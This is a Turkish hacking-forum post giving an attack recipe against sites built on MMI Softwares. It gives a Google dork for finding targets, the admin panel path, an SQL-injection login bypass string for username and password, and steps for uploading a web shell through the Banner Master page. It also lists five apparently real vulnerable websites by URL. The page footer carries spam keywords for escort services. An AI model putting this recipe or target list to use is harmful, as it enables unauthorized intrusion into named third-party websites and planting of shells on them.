MMI Softwares admin page bypass vulnerability / upload shell

TurKLoJeN

TurKLoJeN

Özel Üye
Katılım
7 Tem 2015
Mesajlar
1,015
Tepkime puanı
0
Puanları
0
Yaş
34
Web sitesi
www.turklojen.tk
Merhaba Arkadaşlar Bugün MMI Softwares Dork Exploitini Göreceğiz

[hide]

İlk olarak dorkumuzu google üzerinden aratalım 

PHP: 
Dork :   intext:"Design by MMI Softwares" inurl:admin.php

Dorkumuz ile çıkardığımız sitelerin admin Paneline gidelim

PHP: 
Admin Panel :   site.com/admins/mmi-admin.php

Şimdi kullanıcı adı şifreyi girelim

PHP: 
Username: '=''or'
password: '=''or'

Giriş yapıp Design sayfasına gidip Banner Master bölümünden shell'inizi yüklüyebilirsiniz

PHP: 
Örnek Zafiyetli Siteler

http://www.krishnagoldsindustries.com/admins/mmi-admin.php
http://www.ggchain.in/admins/admins/mmi-admin.php
http://www.jjebook.com/admins/mmi-admin.php
http://www.anuradhatextile.com/admins/mmi-admin.php
http://shalimarpalace.in/admins/mmi-admin.php


---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Exploit Hakkında 

PHP: 
Exploit Başlığı : MMI Softwares admin page bypass vulnerability / upload shell
Tarih : 2018-09-08
Dağıtıcı Sahibi : http://www.mmsoftwares.com/ 
Exploit Sahibi : nothing404.team
Test Edilen Sistem : Kali Linux

[/hide]
 
Cevap yazmak için giriş yap yada kayıt ol.

mersin escort bodrum escort alanya escort kayseri escort konya escort marmaris escort bodrum escort tto dermodicos vozol puff
Üst
Copyright® Ajanlar.org 2012